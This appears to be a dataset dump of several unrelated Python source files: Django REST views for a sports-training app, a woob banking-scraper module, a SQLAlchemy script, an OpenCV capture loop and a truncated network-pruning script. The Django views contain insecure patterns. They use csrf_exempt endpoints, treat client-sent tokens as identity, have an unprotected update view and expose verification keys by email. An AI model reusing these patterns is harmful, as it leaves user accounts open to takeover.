redirect('/api/')\n\n\n@csrf_exempt\ndef add_user_to_group(request, pk):\n if request.method == \"POST\":\n data = json.loads(request.body)\n group_id = data['groupID']\n group = TrainingGroup.objects.get(pk=group_id)\n profile_id = data['token']\n profile = Profile.objects.get(pk=profile_id)\n group.add_user_to_group(profile)\n profile.add_group(group)\n group.members_count = F('members_count') + 1\n return redirect('/api')\n\n\n@csrf_exempt\ndef remove_user_from_requesting(request, pk):\n if request.method == \"POST\":\n data = json.loads(request.body)\n group_id = data['groupID']\n group = TrainingGroup.objects.get(pk=group_id)\n profile_id = data['token']\n profile = Profile.objects.get(pk=profile_id)\n group.remove_user_from_requesting(profile)\n return redirect('/api/')\n\n\n@csrf_exempt\ndef send_verification_email(request, pk):\n if request.method == \"POST\":\n data = json.loads(request.body)\n email = data['email']\n username = data['username']\n token = data['token']\n send_templated_mail(\n template_name='verification',\n from_email='fitexsport.info@gmail.com',\n recipient_list=[email],\n context={\n 'token': token,\n 'username': username,\n },\n )\n return redirect('/api')\n\n\ndef event_cancel_attendance(request, pk):\n this_event = Post.objects.get(pk=pk)\n this_event.remove_user_from_list_of_attendees(user=request.user, pk=this_event.pk)\n return redirect('/' + str(this_event.pk))\n\n\n@csrf_exempt\ndef send(request, pk):\n if request.method == \"POST\":\n data = json.loads(request.body)\n trainingtitle = data['trainingtitle']\n name = data['name']\n email = data['email']\n organizeremail = data['organizeremail']\n send_templated_mail(\n template_name='welcome',\n from_email='fitexsport.info@gmail.com',\n recipient_list=[organizeremail],\n context={\n 'email': email,\n 'name': name,\n 'trainingtitle': trainingtitle,\n },\n )\n return redirect('/api/')\n\n\n@csrf_exempt\ndef admin_login(request):\n if request.method == 'POST':\n data = json.loads(request.body)\n token = data['token']\n user = Profile.objects.get(pk=token)\n is_admin = user.is_admin\n print('is_admin', is_admin)\n if is_admin:\n return HttpResponse(status=200)\n else:\n return HttpResponse(status=401)\n\n\nclass ProfileCreateView(generics.CreateAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n\n\nclass ProfileListView(generics.ListAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n\n\nclass ProfileView(generics.RetrieveAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n lookup_field = 'token'\n lookup_url_kwarg = 'pk'\n\n# view to check if user has account assigned to that certain email\n\nclass ProfileViewByEmail(generics.RetrieveAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n lookup_field = 'email'\n lookup_url_kwarg = 'pk'\n\n# check if logged in user is connected to profile that he/she tries to update\n\n\nclass UserProfileUpdatePermission(permissions.BasePermission):\n def has_object_permission(self, request, view, obj):\n print('kwargs', obj.token)\n token = request.META['HTTP_AUTHORIZATION']\n object_token = obj.token\n if token is not None and token == object_token:\n return True\n else:\n return False\n\n\nclass ProfileViewUpdate(generics.UpdateAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n lookup_field = 'token'\n lookup_url_kwarg = 'pk'\n parser_classes = (MultiPartParser, FormParser, FileUploadParser)\n permission_classes = [UserProfileUpdatePermission]\n\n\nclass ProfileViewPartialUpdate(APIView):\n parser_classes = (MultiPartParser, FormParser, FileUploadParser)\n\n def patch(self, request, *args, **kwargs):\n serializer = ProfileSerializer(data=request.data, partial=True)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n print('error', serializer.errors)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass RequestPasswordResetEmail(generics.GenericAPIView):\n serializer_class = ResetPasswordEmailRequestSerializer\n\n def post(self, request):\n serializer = self.serializer_class(data=request.data)\n serializer.is_valid(raise_exception=True)\n\n\nclass CoachProfileView(generics.RetrieveAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n lookup_field = 'username'\n lookup_url_kwarg = 'pk'\n\n\nclass EventRegistrationsView(generics.ListAPIView):\n queryset = EventRegistration.objects.all()\n serializer_class = EventRegistrationSerializer\n\n def get_queryset(self):\n eventid = self.kwargs['pk']\n return EventRegistration.objects.filter(event=eventid)\n\n\nclass EventRegistrationsListView(generics.ListAPIView):\n queryset = EventRegistration.objects.all()\n serializer_class = EventRegistrationSerializer\n\n def get_queryset(self):\n userid = self.kwargs['pk']\n return EventRegistration.objects.filter(profile=userid)\n\n filter_backends = [DjangoFilterBackend]\n filterset_fields = {'event_date': ['gte', 'lte']}\n\n\n# if user registers via email, send verification token to their email\n@csrf_exempt\ndef generate_and_send_verification_token(request):\n if request.method == \"POST\":\n data = json.loads(request.body)\n email = data['email']\n userName = data['username']\n def token_generator(string_length=7):\n \"\"\"Returns a random string of length string_length.\"\"\"\n random = str(uuid.uuid4()) # Convert UUID format to a Python string.\n random = random.upper() # Make all characters uppercase.\n random = random.replace(\"-\",\"\") # Remove the UUID '-'.\n return random[0:string_length] # Return the random string.\n user_token = token_generator()\n print('userToken', user_token)\n VerificationKey.objects.create(useremail=email, token=user_token)\n send_templated_mail(\n template_name='verification',\n from_email='fitexsport.info@gmail.com',\n recipient_list=[email],\n context={\n 'token': user_token,\n 'username': userName,\n },\n )\n return HttpResponse(status=200)\n\n# chechk if user has entered correct verification key for verifying their email\n@csrf_exempt\ndef check_user_verification_key(request, pk):\n if request.method == \"POST\":\n data = json.loads(request.body)\n userEmail = pk\n key = data['key']\n user_profile = VerificationKey.objects.get(useremail=userEmail)\n user_key = user_profile.token\n if key == user_key:\n return HttpResponse(status=200)\n else:\n return HttpResponse(status=403)\n\nclass VerificationKeyCreateView(generics.CreateAPIView):\n queryset = VerificationKey.objects.all()\n serializer_class = VerificationKeySerializer\n\n\nclass VerificationKeyRetrieve(generics.RetrieveAPIView):\n queryset = VerificationKey.objects.all()\n serializer_class = VerificationKeySerializer\n\n lookup_field = 'useremail'\n lookup_url_kwarg = 'pk'\n\n\nclass VerificationKeyRetrieveByToken(generics.RetrieveAPIView):\n queryset = VerificationKey.objects.all()\n serializer_class = VerificationKeySerializer\n\n lookup_field = 'token'\n lookup_url_kwarg = 'pk'\n\n\nclass VerificationKeyUpdate(generics.UpdateAPIView):\n queryset = VerificationKey.objects.all()\n serializer_class = VerificationKeySerializer\n lookup_field = 'useremail'\n lookup_url_kwarg = 'pk'\n\n\nclass VerificationKeyDelete(generics.DestroyAPIView):\n queryset = VerificationKey.objects.all()\n serializer_class = VerificationKeySerializer\n lookup_field = 'token'\n lookup_url_kwarg = 'pk'\n\n\nclass CoachTrainingsListView(generics.ListAPIView):\n queryset = Post.objects.all()\n serializer_class = TrainingSerializer\n\n def get_queryset(self):\n coachid = self.kwargs['pk']\n return Post.objects.filter(coach=coachid)\n\n\nclass TrainingListResultsPagination(PageNumberPagination):\n page_size = 10\n page_size_query_param = 'page_size'\n max_page_size = 1000\n\n# TrainingsList is trainings list that user sees\n\n\nclass TrainingsListView(generics.ListAPIView):\n queryset = Post.objects.all()\n serializer_class = TrainingSerializer\n filter_backends = [DjangoFilterBackend]\n filterset_fields = {'stringdate': ['gte'], 'sport': ['exact'], 'city': ['exact'], 'stringtime2': ['exact'],\n 'organizername': ['exact'], 'group_id': ['exact'], 'group': ['exact'], 'coach': ['exact']}\n pagination_class = TrainingListResultsPagination\n\n\nclass TrainingUpdateView(generics.GenericAPIView, UpdateModelMixin):\n queryset = Post.objects.all()\n serializer_class = TrainingSerializer\n\n def patch(self, request, *args, **kwargs):\n return self.partial_update(request, *args, **kwargs)\n\n\nclass TrainingGroupCreateView(generics.CreateAPIView):\n queryset = TrainingGroup.objects.all()\n serializer_class = TrainingGroupSerializer\n\n\nclass CoachTrainingGroupListView(generics.ListAPIView):\n queryset = TrainingGroup.objects.all()\n serializer_class = TrainingGroupSerializer\n\n def get_queryset(self):\n coachtoken = self.kwargs['pk']\n return TrainingGroup.objects.filter(coach=coachtoken)\n\n\nclass TrainingGroupRetrieveView(generics.RetrieveAPIView):\n queryset = TrainingGroup.objects.all()\n serializer_class = TrainingGroupSerializer\n\n lookup_field = 'id'\n lookup_url_kwarg = 'pk'\n\n\nclass TrainingGroupDetailUpdate(generics.UpdateAPIView):\n queryset = TrainingGroup.objects.all()\n serializer_class = TrainingGroupSerializer\n lookup_field = 'id'\n lookup_url_kwarg = 'pk'\n parser_classes = (MultiPartParser, FormParser, FileUploadParser)\n\n\nclass TrainingGroupListPagination(PageNumberPagination):\n page_size = 10\n page_size_query_param = 'page_size'\n max_page_size = 1000\n\n\nclass TrainingGroupListView(generics.ListAPIView):\n queryset = TrainingGroup.objects.all()\n serializer_class = TrainingGroupSerializer\n filter_backends = [DjangoFilterBackend]\n filterset_fields = {'sport': ['exact'], 'location': ['exact'], 'coach_name': ['exact'], 'name': ['exact']}\n pagination_class = TrainingGroupListPagination\n\n\nclass GroupMemberRetrieve(generics.ListAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n\n lookup_field = 'token'\n lookup_url_kwarg = 'pk'\n\n\nclass AdminPermission(permissions.BasePermission):\n def has_permission(self, request, view):\n token = request.META['HTTP_AUTHORIZATION']\n print('TokeN', token)\n user = Profile.objects.get(pk=token)\n admin = user.is_admin\n return admin\n\n\nclass UserListResultsPagination(PageNumberPagination):\n page_size = 5\n page_size_query_param = 'page_size'\n max_page_size = 10000\n\n\nclass UsersListView(generics.ListAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n permission_classes = [AdminPermission] # allows only admins to access users list\n filter_backends = [DjangoFilterBackend]\n\n pagination_class = UserListResultsPagination\n\n filterset_fields = {'email': ['exact'], 'is_coach': ['exact'], 'is_athlete': ['exact']}\n\n\nclass UserStatusUpdate(generics.UpdateAPIView):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n permission_classes = [AdminPermission]\n\n lookup_field = 'token'\n lookup_url_kwarg = 'pk'\n\n","repo_name":"austinroose/FitexSport","sub_path":"fitex/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":17723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3966868766","text":"import re\nimport time\nfrom collections import Counter\nfrom fnmatch import fnmatch\nfrom urllib.parse import urlparse\n\nfrom requests import HTTPError, TooManyRedirects\n\nfrom woob.browser import need_login\nfrom woob.browser.url import URL\nfrom woob.browser.exceptions import ClientError\nfrom woob.exceptions import BrowserIncorrectPassword, BrowserUnavailable\nfrom woob.capabilities.base import find_object\nfrom woob.tools.capabilities.bank.transactions import (\n sorted_transactions, omit_deferred_transactions, keep_only_card_transactions,\n)\nfrom woob.tools.json import json\nfrom woob_modules.linebourse.browser import LinebourseAPIBrowser\n\nfrom .pages import (\n CenetLoginPage, CenetHomePage,\n CenetAccountsPage, CenetAccountHistoryPage, CenetCardsPage,\n CenetCardSummaryPage, SubscriptionPage, DownloadDocumentPage,\n CenetLoanPage, LinebourseTokenPage,\n)\nfrom ..browser import CaisseEpargneLogin\nfrom ..pages import CaissedepargneKeyboard\n\n\n__all__ = ['CenetBrowser']\n\n\nclass CenetBrowser(CaisseEpargneLogin):\n BASEURL = \"https://www.cenet.caisse-epargne.fr\"\n\n SKIP_LOCATE_BROWSER_ON_CONFIG_VALUES = ('otp_sms',)\n STATE_DURATION = 5\n\n cenet_vk = URL(r'https://www.cenet.caisse-epargne.fr/Web/Api/ApiAuthentification.asmx/ChargerClavierVirtuel')\n cenet_home = URL(\n r'/Default.aspx$',\n r'/default.aspx$',\n CenetHomePage\n )\n cenet_accounts = URL(r'/Web/Api/ApiComptes.asmx/ChargerSyntheseComptes', CenetAccountsPage)\n cenet_market_accounts = URL(r'/Web/Api/ApiBourse.asmx/ChargerComptesTitres', CenetAccountsPage)\n cenet_loans = URL(r'/Web/Api/ApiFinancements.asmx/ChargerListeFinancementsMLT', CenetLoanPage)\n cenet_account_history = URL(r'/Web/Api/ApiComptes.asmx/ChargerHistoriqueCompte', CenetAccountHistoryPage)\n cenet_account_coming = URL(r'/Web/Api/ApiCartesBanquaires.asmx/ChargerEnCoursCarte', CenetAccountHistoryPage)\n cenet_tr_detail = URL(r'/Web/Api/ApiComptes.asmx/ChargerDetailOperation', CenetCardSummaryPage)\n cenet_cards = URL(r'/Web/Api/ApiCartesBanquaires.asmx/ChargerCartes', CenetCardsPage)\n cenet_login = URL(\n r'https://.*/$',\n r'https://.*/default.aspx',\n CenetLoginPage,\n )\n linebourse_token = URL(r'/Web/Api/ApiBourse.asmx/GenererJeton', LinebourseTokenPage)\n\n subscription = URL(r'/Web/Api/ApiReleves.asmx/ChargerListeEtablissements', SubscriptionPage)\n documents = URL(r'/Web/Api/ApiReleves.asmx/ChargerListeReleves', SubscriptionPage)\n download = URL(r'/Default.aspx\\?dashboard=ComptesReleves&lien=SuiviReleves', DownloadDocumentPage)\n\n LINEBOURSE_BROWSER = LinebourseAPIBrowser\n MARKET_URL = 'https://www.caisse-epargne.offrebourse.com'\n\n def __init__(self, *args, **kwargs):\n # This value is useful to display deferred transactions if PSU has no card but only CHECKING account\n self.has_cards_displayed = False\n super(CenetBrowser, self).__init__(*args, **kwargs)\n\n dirname = self.responses_dirname\n if dirname:\n dirname += '/bourse'\n\n self.linebourse = self.LINEBOURSE_BROWSER(\n self.MARKET_URL,\n logger=self.logger,\n responses_dirname=dirname,\n woob=self.woob,\n proxy=self.PROXIES,\n )\n\n def deinit(self):\n super(CenetBrowser, self).deinit()\n self.linebourse.deinit()\n\n def set_base_url(self):\n self.BASEURL = self.CENET_URL\n\n def locate_browser(self, state):\n # parent's behavior\n if self.should_skip_locate_browser():\n return\n\n # otherwise, force going on home to avoid some bugs on other URL GET requests.\n try:\n self.cenet_home.go()\n except (HTTPError, TooManyRedirects):\n pass\n\n def do_login(self):\n if self.API_LOGIN:\n self.browser_switched = True\n # We use CaisseEpargneLogin do_login\n # browser_switched avoids to switch again\n super(CenetBrowser, self).do_login()\n\n # when we use CaisseEpargneLogin do_login we should reset the\n # value of BASEURL to CENET_URL (changed in login_finalize()-CaisseEpargneLogin).\n self.set_base_url()\n return\n\n data = self.login.go(login=self.username).get_response()\n\n if len(data['account']) > 1:\n # additional request where there is more than one\n # connection type (called typeAccount)\n # TODO: test all connection type values if needed\n account_type = data['account'][0]\n self.account_login.go(login=self.username, accountType=account_type)\n data = self.page.get_response()\n\n if data is None:\n raise BrowserIncorrectPassword()\n elif not self.nuser:\n raise BrowserIncorrectPassword(\"Erreur: Numéro d'utilisateur requis.\")\n\n if data.get('authMode') == 'redirectArrimage' and self.BASEURL in data['url']:\n # The login authentication is the same than non cenet user\n self.browser_switched = True\n super(CenetBrowser, self).do_login()\n\n # when we use CaisseEpargneLogin do_login we should reset the\n # value of BASEURL to CENET_URL (changed in login_finalize()-CaisseEpargneLogin).\n self.set_base_url()\n return\n elif data.get('authMode') != 'redirect':\n raise BrowserIncorrectPassword()\n\n payload = {'contexte': '', 'dataEntree': None, 'donneesEntree': \"{}\", 'filtreEntree': \"\\\"false\\\"\"}\n res = self.cenet_vk.open(data=json.dumps(payload), headers={'Content-Type': \"application/json\"})\n content = json.loads(res.text)\n d = json.loads(content['d'])\n end = json.loads(d['DonneesSortie'])\n\n _id = end['Identifiant']\n vk = CaissedepargneKeyboard(end['Image'], end['NumerosEncodes'])\n code = vk.get_string_code(self.password)\n\n post_data = {\n 'CodeEtablissement': data['codeCaisse'],\n 'NumeroBad': self.username,\n 'NumeroUtilisateur': self.nuser,\n }\n\n self.location(data['url'], data=post_data, headers={'Referer': 'https://www.cenet.caisse-epargne.fr/'})\n\n return self.page.login(self.username, self.password, self.nuser, data['codeCaisse'], _id, code)\n\n @need_login\n def go_linebourse(self):\n data = {\n 'contexte': '',\n 'dateEntree': None,\n 'donneesEntree': 'null',\n 'filtreEntree': None,\n }\n try:\n self.linebourse_token.go(json=data)\n except BrowserUnavailable:\n # The linebourse space is not available on every connection\n raise AssertionError('No linebourse space')\n linebourse_token = self.page.get_token()\n\n self.location(\n self.absurl('/ReroutageSJR', self.MARKET_URL),\n data={'SJRToken': linebourse_token},\n )\n self.linebourse.session.cookies.update(self.session.cookies)\n domain = urlparse(self.url).netloc\n self.linebourse.session.headers['X-XSRF-TOKEN'] = self.session.cookies.get('XSRF-TOKEN', domain=domain)\n\n @need_login\n def get_accounts_list(self):\n if self.accounts is None:\n data = {\n 'contexte': '',\n 'dateEntree': None,\n 'donneesEntree': 'null',\n 'filtreEntree': None,\n }\n\n # get accounts from CenetAccountsPage\n try:\n self.accounts = list(self.cenet_accounts.go(json=data).get_accounts())\n except ClientError:\n # Unauthorized due to wrongpass\n raise BrowserIncorrectPassword()\n\n # get cards, and potential missing card's parent accouts from CenetCardsPage\n try:\n self.cenet_cards.go(json=data)\n except BrowserUnavailable:\n # for some accounts, the site can throw us an error, during weeks\n self.logger.warning('ignoring cards because site is unavailable...')\n else:\n if not self.accounts:\n shallow_parent_accounts = list(self.page.iter_shallow_parent_accounts())\n if shallow_parent_accounts:\n self.logger.info('Found shallow parent account(s)): %s' % shallow_parent_accounts)\n self.accounts.extend(shallow_parent_accounts)\n\n cards = list(self.page.iter_cards())\n if cards:\n self.has_cards_displayed = True\n redacted_ids = Counter(card.id[:4] + card.id[-6:] for card in cards)\n for redacted_id in redacted_ids:\n assert redacted_ids[redacted_id] == 1, 'there are several cards with the same id %r' % redacted_id\n\n for card in cards:\n card.parent = find_object(self.accounts, id=card._parent_id)\n assert card.parent, 'no parent account found for card %s' % card\n self.accounts.extend(cards)\n\n # get loans from CenetLoanPage\n self.cenet_loans.go(json=data)\n for account in self.page.get_accounts():\n self.accounts.append(account)\n\n # get market accounts from market_accounts page\n self.cenet_market_accounts.go(json=data)\n market_accounts = list(self.page.get_accounts())\n if market_accounts:\n linebourse_account_ids = {}\n try:\n if any(account._access_linebourse for account in market_accounts):\n self.go_linebourse()\n params = {'_': '{}'.format(int(time.time() * 1000))}\n self.linebourse.account_codes.go(params=params)\n if self.linebourse.account_codes.is_here():\n linebourse_account_ids = self.linebourse.page.get_accounts_list()\n except AssertionError as e:\n if str(e) != 'No linebourse space':\n raise e\n finally:\n self.cenet_home.go()\n for account in market_accounts:\n for linebourse_id in linebourse_account_ids:\n if account.id in linebourse_id:\n account._is_linebourse = True\n self.accounts.append(account)\n return self.accounts\n\n def get_loans_list(self):\n return []\n\n def _matches_card(self, tr, full_id):\n return fnmatch(full_id, tr.card)\n\n def has_no_history(self, account):\n return account.type in (account.TYPE_LOAN, account.TYPE_SAVINGS)\n\n @need_login\n def get_history(self, account):\n if self.has_no_history(account):\n return []\n\n if getattr(account, '_is_linebourse', False):\n try:\n self.go_linebourse()\n return self.linebourse.iter_history(account.id)\n finally:\n self.cenet_home.go()\n\n if account.type == account.TYPE_CARD:\n if not account.parent._formated and account._hist:\n # this is a card account with a shallow parent\n return []\n else:\n # this is a card account with data available on the parent\n def match_card(tr):\n # ex: account.number=\"1234123456123456\", tr.card=\"1234******123456\"\n return fnmatch(account.number, tr.card)\n hist = self.get_history_base(account.parent, card_number=account.number)\n return keep_only_card_transactions(hist, match_card)\n\n if not self.has_cards_displayed:\n return self.get_history_base(account)\n\n # this is any other account\n return omit_deferred_transactions(self.get_history_base(account))\n\n def get_history_base(self, account, card_number=None):\n data = {\n 'contexte': '',\n 'dateEntree': None,\n 'filtreEntree': None,\n 'donneesEntree': json.dumps(account._formated),\n }\n self.cenet_account_history.go(json=data)\n\n while True:\n for tr in self.page.get_history(coming=False):\n # yield transactions from account\n\n # if account is a card, this does not include card_summary detail\n # if account is a checking and has no card displayed on the website but still has deferred\n # transactions listed, we skip the card summary label (eg: CB 0123******3210 TOT DIF JUILLET)\n # and get all the included transactions\n if (\n tr.type == tr.TYPE_CARD_SUMMARY and (\n card_number or re.search(r'^CB [\\d\\*]+ TOT DIF .*', tr.label)\n ) and not self.has_cards_displayed\n ):\n if card_number:\n yield tr\n # checking if card_summary is for this card\n assert tr.card, 'card summary has no card number?'\n if not self._matches_card(tr, card_number):\n continue\n\n # getting detailed transactions for card_summary\n donneesEntree = {}\n donneesEntree['Compte'] = account._formated\n\n donneesEntree['ListeOperations'] = [tr._data]\n deferred_data = {\n 'contexte': '',\n 'dateEntree': None,\n 'donneesEntree': json.dumps(donneesEntree).replace('/', '\\\\/'),\n 'filtreEntree': json.dumps(tr._data).replace('/', '\\\\/'),\n }\n tr_detail_page = self.cenet_tr_detail.open(json=deferred_data)\n\n parent_tr = tr\n for tr in tr_detail_page.get_history():\n tr.card = parent_tr.card\n yield tr\n else:\n # Insert yield here enables to skip card summary when PSU\n # has no card account (cf previous explanation)\n yield tr\n offset = self.page.next_offset()\n if not offset:\n break\n\n data['filtreEntree'] = json.dumps({\n 'Offset': offset,\n })\n self.cenet_account_history.go(json=data)\n\n @need_login\n def get_coming(self, account):\n if account.type != account.TYPE_CARD:\n return []\n\n trs = []\n\n data = {\n 'contexte': '',\n 'dateEntree': None,\n 'donneesEntree': json.dumps(account._hist),\n 'filtreEntree': None,\n }\n\n self.cenet_account_coming.go(json=data)\n for tr in self.page.get_history(coming=True):\n trs.append(tr)\n\n return sorted_transactions(trs)\n\n @need_login\n def get_investment(self, account):\n if getattr(account, '_is_linebourse', False):\n try:\n self.go_linebourse()\n return self.linebourse.iter_investments(account.id)\n finally:\n self.cenet_home.go()\n return []\n\n @need_login\n def iter_market_orders(self, account):\n if getattr(account, '_is_linebourse', False):\n try:\n self.go_linebourse()\n return self.linebourse.iter_market_orders(account.id)\n finally:\n self.cenet_home.go()\n return []\n\n @need_login\n def get_advisor(self):\n return [self.cenet_home.stay_or_go().get_advisor()]\n\n @need_login\n def get_profile(self):\n return self.cenet_home.stay_or_go().get_profile()\n\n def iter_recipients(self, origin_account):\n raise NotImplementedError()\n\n def init_transfer(self, account, recipient, transfer):\n raise NotImplementedError()\n\n def new_recipient(self, recipient, **params):\n raise NotImplementedError()\n\n @need_login\n def iter_subscription(self):\n subscriber = self.get_profile().name\n json_data = {\n 'contexte': '',\n 'dateEntree': None,\n 'donneesEntree': 'null',\n 'filtreEntree': None,\n }\n self.subscription.go(json=json_data)\n return self.page.iter_subscription(subscriber=subscriber)\n\n @need_login\n def iter_documents(self, subscription):\n sub_id = subscription.id\n input_filter = {\n 'Page': 0,\n 'NombreParPage': 0,\n 'Tris': [],\n 'Criteres': [\n {'Champ': 'Etablissement', 'TypeCritere': 'Equals', 'Value': sub_id},\n {'Champ': 'DateDebut', 'TypeCritere': 'Equals', 'Value': None},\n {'Champ': 'DateFin', 'TypeCritere': 'Equals', 'Value': None},\n {'Champ': 'MaxRelevesAffichesParNumero', 'TypeCritere': 'Equals', 'Value': '100'},\n ],\n }\n json_data = {\n 'contexte': '',\n 'dateEntree': None,\n 'donneesEntree': 'null',\n 'filtreEntree': json.dumps(input_filter),\n }\n self.documents.go(json=json_data)\n return self.page.iter_documents(sub_id=sub_id, sub_label=subscription.label, username=self.username)\n\n @need_login\n def download_document(self, document):\n self.download.go()\n return self.page.download_form(document).content\n\n def iter_emitters(self):\n raise NotImplementedError()\n","repo_name":"rbignon/woob","sub_path":"modules/caissedepargne/cenet/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":17555,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"47"} +{"seq_id":"25743379244","text":"#!/usr/bin/python3\n\"\"\"\nStart link class to table in database\n\"\"\"\nimport sys\nfrom model_state import Base, State\nfrom sqlalchemy import (create_engine)\nfrom sqlalchemy.orm import sessionmaker\n\n\nif __name__ == \"__main__\":\n engine = create_engine(\n 'mysql+mysqldb://{}:{}@localhost/{}'.format(\n sys.argv[1],\n sys.argv[2],\n sys.argv[3]\n ),\n pool_pre_ping=True\n )\n Base.metadata.create_all(engine)\n Session = sessionmaker(bind=engine)\n session = Session()\n try:\n ls = session.query(State).order_by(State.id).all()\n for states in ls:\n if 'a' in states.name:\n print(\"{}: {}\".format(states.id, states.name))\n except Exception:\n print(\"Nothing\")\n session.close()\n","repo_name":"j4ir0st/holbertonschool-higher_level_programming","sub_path":"0x0F-python-object_relational_mapping/9-model_state_filter_a.py","file_name":"9-model_state_filter_a.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8401282724","text":"import numpy as np\nimport cv2\n\n# Minimal example of capturing and modifying video with openCV\n# Start the capture\ncap = cv2.VideoCapture(0)\n\n# Infinite loop\nwhile True:\n # Capture frame by frame\n ret, frame = cap.read()\n\n # Perform operations on the frame\n rotate = cv2.rotate(frame, cv2.ROTATE_180)\n\n # Show the frame on openCVs native gui\n cv2.imshow('frame', rotate)\n\n # Quit on press of 'q'\n if(cv2.waitKey(1) & 0xFF == ord('q')):\n break\n\n# Clean up\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"tgrbrooks/RoboAI","sub_path":"src/vision/capture.py","file_name":"capture.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"8678602896","text":"from __future__ import print_function\nimport argparse\nimport torch\nimport torch.nn.functional as F\nfrom optimizer import PruneAdam\nfrom model import LeNet, AlexNet\nfrom utils import regularized_nll_loss, admm_loss, \\\n initialize_Z_and_U, update_X, update_Z, update_Z_l1, update_U, \\\n print_convergence, print_prune, apply_prune, apply_l1_prune\nfrom torchvision import datasets, transforms\nfrom tqdm import tqdm\n\n\ndef train(args, model, device, train_loader, test_loader, optimizer):\n for epoch in range(args.num_pre_epochs):\n print('Pre epoch: {}'.format(epoch + 1))\n model.train()\n for batch_idx, (data, target) in enumerate(tqdm(train_loader)):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = regularized_nll_loss(args, model, output, target)\n loss.backward()\n optimizer.step()\n test(args, model, device, test_loader)\n\n Z, U = initialize_Z_and_U(model)\n for epoch in range(args.num_epochs):\n model.train()\n print('Epoch: {}'.format(epoch + 1))\n for batch_idx, (data, target) in enumerate(tqdm(train_loader)):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = admm_loss(args, device, model, Z, U, output, target)\n loss.backward()\n optimizer.step()\n X = update_X(model)\n Z = update_Z_l1(X, U, args) if args.l1 else update_Z(X, U, args)\n U = update_U(U, X, Z)\n print_convergence(model, X, Z)\n test(args, model, device, test_loader)\n\n\ndef test(args, model, device, test_loader):\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\n\ndef retrain(args, model, mask, device, train_loader, test_loader, optimizer):\n for epoch in range(args.num_re_epochs):\n print('Re epoch: {}'.format(epoch + 1))\n model.train()\n for batch_idx, (data, target) in enumerate(tqdm(train_loader)):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.prune_step(mask)\n\n test(args, model, device, test_loader)\n\n\ndef main():\n # Training settings\n parser = argparse.ArgumentParser(description='PyTorch MNIST Example')\n parser.add_argument('--dataset', type=str, default=\"mnist\", choices=[\"mnist\", \"cifar10\"],\n metavar='D', help='training dataset (mnist or cifar10)')\n parser.add_argument('--batch-size', type=int, default=64, metavar='N',\n help='input batch size for training (default: 64)')\n parser.add_argument('--test-batch-size', type=int, default=1000, metavar='N',\n help='input batch size for testing (default: 1000)')\n parser.add_argument('--percent', type=list, default=[0.8, 0.92, 0.991, 0.93],\n metavar='P', help='pruning percentage (default: 0.8)')\n parser.add_argument('--alpha', type=float, default=5e-4, metavar='L',\n help='l2 norm weight (default: 5e-4)')\n parser.add_argument('--rho', type=float, default=1e-2, metavar='R',\n help='cardinality weight (default: 1e-2)')\n parser.add_argument('--l1', default=False, action='store_true',\n help='prune weights with l1 regularization instead of cardinality')\n parser.add_argument('--l2', default=False, action='store_true',\n help='apply l2 regularization')\n parser.add_argument('--num_pre_epochs', type=int, default=3, metavar='P',\n help='number of epochs to pretrain (default: 3)')\n parser.add_argument('--num_epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--num_re_epochs', type=int, default=3, metavar='R',\n help='number of epochs to retrain (default: 3)')\n parser.add_argument('--lr', type=float, default=1e-3, metavar='LR',\n help='learning rate (default: 1e-2)')\n parser.add_argument('--adam_epsilon', type=float, default=1e-8, metavar='E',\n help='adam epsilon (default: 1e-8)')\n parser.add_argument('--no-cuda', action='store_true', default=False,\n help='disables CUDA training')\n parser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--save-model', action='store_true', default=False,\n help='For Saving the current Model')\n args = parser.parse_args()\n\n use_cuda = not args.no_cuda and torch.cuda.is_available()\n\n torch.manual_seed(args.seed)\n\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n kwargs = {'num_workers': 1, 'pin_memory': True} if use_cuda else {}\n\n if args.dataset == \"mnist\":\n train_loader = torch.utils.data.DataLoader(\n datasets.MNIST('data', train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n\n test_loader = torch.utils.data.DataLoader(\n datasets.MNIST('data', train=False, transform=transforms.Compose([\n 